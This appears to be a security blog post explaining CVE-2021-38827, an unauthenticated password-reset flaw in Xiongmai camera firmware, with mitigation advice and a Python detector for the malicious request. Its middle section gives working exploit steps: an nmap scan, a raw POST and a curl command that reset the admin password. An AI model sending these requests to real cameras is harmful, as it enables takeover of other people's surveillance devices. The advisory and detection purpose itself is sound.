If you’re using Xiongmai cameras, particularly the model XM-JPR2-LX running firmware version V4.02.R12.A6420987.10002.147502.00000, your security could be at risk. In this post, we deep-dive into CVE-2021-38827 – a critical vulnerability that can let an attacker take over any account on your camera, giving them full control over video streams, device config, and more.

What’s CVE-2021-38827?

Discovered by security researcher mehdy, CVE-2021-38827 affects a range of Xiongmai IoT devices, including several popular camera models. On affected versions, improper authentication inside the web interface allows attackers to bypass login and change passwords without proper checks. This leads to a classic account takeover scenario.

How Does the Vulnerability Work?

On vulnerable firmware, the web management interface fails to properly verify a user's identity before allowing password changes or sensitive operations. Attackers can send a specially-crafted HTTP POST request to the management portal and reset any user’s password. Once changed, they can then log in as the admin or any other user.

The vulnerable endpoint typically looks like this:

POST http://<camera_ip>/cgi-bin/gw.cgi?Cmd=SET_USERINFO

The firmware does not check for a valid session or the current password before processing this command. Anyone who can reach the camera over the network can send the request and change a password.

1. Discover Camera IP

The camera usually listens on port 80 (HTTP) on the local network. Nmap or a similar scanner can find it:

nmap -p 80 192.168.1.0/24

2. Send the Password-Change Request

No authentication is needed; the attacker simply POSTs this payload to the device:

POST /cgi-bin/gw.cgi?Cmd=SET_USERINFO HTTP/1.1
Host: <camera_ip>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

UserName=admin&Password=new_secure_password&UserLevel=&ENUserName=admin

The payload above sets the admin password to new_secure_password. The existing password is never required.

Example with curl:

curl -X POST \
  "http://192.168.1.200/cgi-bin/gw.cgi?Cmd=SET_USERINFO" \
  -d "UserName=admin&Password=newsecurepassword&UserLevel=&ENUserName=admin"

3. Log In with the New Password

After the request succeeds, the attacker opens the management page:

http://192.168.1.200/

Logging in with admin:newsecurepassword gives full control of the camera.

Impact

With administrative access, an attacker can:

- Disable the device or reconfigure it for malicious purposes (e.g., use it as a pivot for further attacks)
- Add/remove accounts

Mitigation

- Update Firmware: If newer, secure firmware is available from Xiongmai, update immediately.
- Network Segmentation: Make sure your cameras are on isolated networks, inaccessible from the internet.
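Until a patch or isolation is in place, monitoring for the request pattern described above is the practical detection. The following is an added example, not code from the original post or from Xiongmai: it parses raw HTTP requests as a sensor or reverse proxy in front of the camera might capture them (sample requests below are constructed, and the assumption that a legitimate session carries a Cookie or Authorization header is an assumption, not vendor-documented behaviour) and flags SET_USERINFO requests that arrive with no authentication at all.

```python
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (not captured traffic). The first mirrors the
# unauthenticated password change discussed in the post; the second carries a
# session cookie; the third is an unrelated request to the same CGI.
SAMPLE_REQUESTS = [
    "POST /cgi-bin/gw.cgi?Cmd=SET_USERINFO HTTP/1.1\r\n"
    "Host: 192.168.1.200\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 69\r\n\r\n"
    "UserName=admin&Password=newsecurepassword&UserLevel=&ENUserName=admin",
    "POST /cgi-bin/gw.cgi?Cmd=SET_USERINFO HTTP/1.1\r\n"
    "Host: 192.168.1.200\r\n"
    "Cookie: SESSIONID=constructed-example\r\n\r\n"
    "UserName=viewer&Password=x&UserLevel=&ENUserName=viewer",
    "GET /cgi-bin/gw.cgi?Cmd=GET_DEVICEINFO HTTP/1.1\r\n"
    "Host: 192.168.1.200\r\n\r\n",
]


def parse_request(raw: str) -> Dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parse_qs(parts.query),
            "headers": headers, "body": parse_qs(body)}


def flag_unauth_userinfo(raw: str) -> Optional[str]:
    """Return an alert string for an unauthenticated SET_USERINFO POST, else None."""
    req = parse_request(raw)
    if req["method"] != "POST" or req["path"] != "/cgi-bin/gw.cgi":
        return None
    if req["query"].get("Cmd", [""])[0].upper() != "SET_USERINFO":
        return None
    # Assumption: a legitimate browser session presents a Cookie or Authorization header.
    if "cookie" in req["headers"] or "authorization" in req["headers"]:
        return None
    user = req["body"].get("UserName", ["?"])[0]
    return f"unauthenticated SET_USERINFO for user '{user}' on {req['headers'].get('host', '?')}"


def scan(requests: List[str]) -> List[str]:
    """Run the detector over a batch of raw requests and collect alerts."""
    return [a for a in (flag_unauth_userinfo(r) for r in requests) if a]
```

Run against SAMPLE_REQUESTS, only the first request produces an alert; wire the same check into a proxy or IDS rule to alert on the live camera segment.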

References

- CVE-2021-38827 (NVD)
- Original exploit details / advisory
- Vendor website (Xiongmai)

Conclusion

CVE-2021-38827 is a glaring example of how poor authentication design can lead to a full account takeover. If you use the Xiongmai XM-JPR2-LX (or any similar Xiongmai-powered camera), your device may be wide open until patched or isolated.

Stay secure: patch quickly, use strong and unique passwords, and never expose IoT devices directly to the internet.

If you found this guide useful, share it with anyone you know running Xiongmai cameras!

Timeline

Published on: 11/14/2022 02:15:00 UTC
Last modified on: 11/16/2022 18:29:00 UTC